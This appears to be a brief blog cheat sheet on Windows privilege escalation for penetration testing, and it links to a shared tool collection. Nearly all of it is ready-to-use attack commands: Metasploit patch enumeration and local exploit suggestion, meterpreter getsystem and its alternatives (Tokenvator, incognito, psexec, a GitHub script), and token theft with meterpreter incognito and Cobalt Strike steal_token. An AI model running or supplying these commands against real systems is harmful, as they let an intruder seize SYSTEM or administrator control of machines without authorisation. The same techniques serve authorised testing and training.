Privilege escalation tool collection (free share): Quark Netdisk share
Previous articles
WEB Penetration Win Privilege Escalation: RDP & Firewall - CSDN Blog
WEB Penetration Win Privilege Escalation: AccountSpoofing - CSDN Blog
MSF
Enumerate installed patches
msf> use post/windows/gather/enum_patches
List candidate local exploits
msf> use post/multi/recon/local_exploit_suggester
getsystem
meterpreter> getsystem
getsystem alternatives
>Tokenvator.exe getsystem cmd.exe
>incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe
>psexec -s -i cmd.exe
>python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc
Token theft
MSF
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token name\\administrator
or
meterpreter> ps
meterpreter> steal_token pid
Cobalt strike
beacon> steal_token 1234   # steal the token of process 1234
beacon> rev2self           # revert to the original token
Windows
https://gitee.com/RichChigga/incognito2